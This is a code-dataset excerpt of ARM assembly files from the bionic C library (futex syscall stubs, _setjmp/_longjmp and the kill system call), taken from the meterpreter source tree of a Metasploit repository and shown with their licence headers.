.type __futex_syscall4, %function
#if __ARM_EABI__
__futex_syscall3:
.fnstart
stmdb sp!, {r4, r7}
.save {r4, r7}
ldr r7, =__NR_futex
swi #0
ldmia sp!, {r4, r7}
bx lr
.fnend
__futex_wait:
.fnstart
stmdb sp!, {r4, r7}
.save {r4, r7}
mov r3, r2
mov r2, r1
mov r1, #FUTEX_WAIT
ldr r7, =__NR_futex
swi #0
ldmia sp!, {r4, r7}
bx lr
.fnend
__futex_wake:
stmdb sp!, {r4, r7}
mov r2, r1
mov r1, #FUTEX_WAKE
ldr r7, =__NR_futex
swi #0
ldmia sp!, {r4, r7}
bx lr
#else
__futex_syscall3:
swi #__NR_futex
bx lr
__futex_wait:
mov r3, r2
mov r2, r1
mov r1, #FUTEX_WAIT
swi #__NR_futex
bx lr
__futex_wake:
mov r2, r1
mov r1, #FUTEX_WAKE
swi #__NR_futex
bx lr
#endif
__futex_syscall4:
b __futex_syscall3
|
OpenWireSec/metasploit | 3,225 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/_setjmp.S | /* $OpenBSD: _setjmp.S,v 1.2 2004/02/01 05:40:52 drahn Exp $ */
/* $NetBSD: _setjmp.S,v 1.5 2003/04/05 23:08:51 bjh21 Exp $ */
/*
* Copyright (c) 1997 Mark Brinicombe
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by Mark Brinicombe
* 4. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
#include <machine/setjmp.h>
/*
* C library -- _setjmp, _longjmp
*
* _longjmp(a,v)
* will generate a "return(v)" from the last call to
* _setjmp(a)
* by restoring registers from the stack.
* The previous signal state is NOT restored.
*
* Note: r0 is the return value
* r1-r3 are scratch registers in functions
*/
ENTRY(_setjmp)
ldr r1, .L_setjmp_magic
str r1, [r0], #4
#ifdef SOFTFLOAT
add r0, r0, #52
#else
/* Store fp registers */
sfm f4, 4, [r0], #48
/* Store fpsr */
rfs r1
str r1, [r0], #0x0004
#endif /* SOFTFLOAT */
/* Store integer registers */
stmia r0, {r4-r14}
mov r0, #0x00000000
bx lr
.L_setjmp_magic:
.word _JB_MAGIC__SETJMP
ENTRY(_longjmp)
ldr r2, .L_setjmp_magic
ldr r3, [r0], #4
teq r2, r3
bne botch
#ifdef SOFTFLOAT
add r0, r0, #52
#else
/* Restore fp registers */
lfm f4, 4, [r0], #48
/* Restore fpsr */
ldr r4, [r0], #0x0004
wfs r4
#endif /* SOFTFLOAT */
/* Restore integer registers */
ldmia r0, {r4-r14}
/* Validate sp and r14 */
teq sp, #0
teqne r14, #0
beq botch
/* Set return value */
mov r0, r1
teq r0, #0x00000000
moveq r0, #0x00000001
bx lr
/* validation failed, die die die. */
botch:
bl PIC_SYM(_C_LABEL(longjmperror), PLT)
bl PIC_SYM(_C_LABEL(abort), PLT)
b . - 8 /* Cannot get here */
|
OpenWireSec/metasploit | 2,057 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/kill.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/* unlike our auto-generated syscall stubs, this code saves lr
on the stack, as well as a few other registers. this makes
our stack unwinder happy, when we generate debug stack
traces after the C library or other parts of the system
abort due to a fatal runtime error (e.g. detection
of a corrupted malloc heap).
*/
#include <sys/linux-syscalls.h>
#ifndef __NR_kill
#define __NR_kill 37
#endif
.text
.type kill, #function
.globl kill
.align 4
kill:
stmfd sp!, {r4-r7, ip, lr}
ldr r7, =__NR_kill
swi #0
ldmfd sp!, {r4-r7, ip, lr}
movs r0, r0
bxpl lr
b __set_syscall_errno
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.